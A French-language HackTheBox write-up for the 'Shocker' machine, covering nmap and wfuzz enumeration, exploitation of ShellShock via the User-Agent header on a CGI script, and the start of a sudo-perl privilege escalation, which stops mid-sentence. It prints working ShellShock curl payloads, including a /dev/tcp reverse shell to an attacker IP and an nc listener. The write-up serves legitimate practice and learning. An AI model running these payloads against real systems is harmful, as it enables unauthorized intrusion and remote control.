Shocker HackTheBox (Writeup)

Skills:

ShellShock Attack (User-Agent)
Abusing Sudoers Privilege (Perl)

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -n -Pn -sS -vvv --min-rate 5000 10.10.10.56 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard (80,2222)

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p80,2222 10.10.10.56 -oN targeted

Port 80 - HTTP

Enumeration des répertoires

Nous utilisons WFuzz pour identifier les répertoires accessibles :

wfuzz -c -t 200 --hc=404 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt http://10.10.10.56/FUZZ/ | grep -v "#"

Cela nous révèle le répertoire cgi-bin, souvent associé à des scripts exploitables.

Vulnérabilité ShellShock

Recherche de fichiers exploitables

Nous filtrons pour des fichiers avec des extensions comme .sh, .pl, ou .cgi :

wfuzz -c -t 200 --hc=404,403 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -z list,sh-pl-cgi http://10.10.10.56/cgi-bin/FUZZ.FUZ2Z

Le fichier user.sh est identifié. Ce script semble dynamique et peut être vulnérable.

Détection de la vulnérabilité

Nous utilisons le script Nmap suivant pour tester la vulnérabilité :

nmap --script http-shellshock --script-args uri=/cgi-bin/user.sh -p80 10.10.10.56

Le scan confirme que le fichier user.sh est vulnérable à ShellShock.

Exécution de commandes

Pour tester l'exécution de commandes, nous utilisons curl avec un User-Agent malveillant :

curl -s -X GET "http://10.10.10.56/cgi-bin/user.sh" -H "User-Agent: () { :; }; echo; /usr/bin/whoami"

Cela retourne le nom de l'utilisateur actif.

Reverse Shell

Pour obtenir un shell inversé :

Écoutez sur le port 443 :

nc -nlvp 443

Injectez le payload suivant :

-H "User-Agent: () { :; }; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.7/443 0>&1'"

curl -s -X GET "http://10.10.10.56/cgi-bin/user.sh" -H "User-Agent: () { :; }; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.7/443 0>&1'"

Flag user.txt :)

Élévation de Privilèges

Sudoers - Perl

Lors de l'analyse des droits Sudoers, on remarque que l'utilisateur a la permission d'exécuter perl en tant que root. Cela peut être vérifié avec la commande suivante :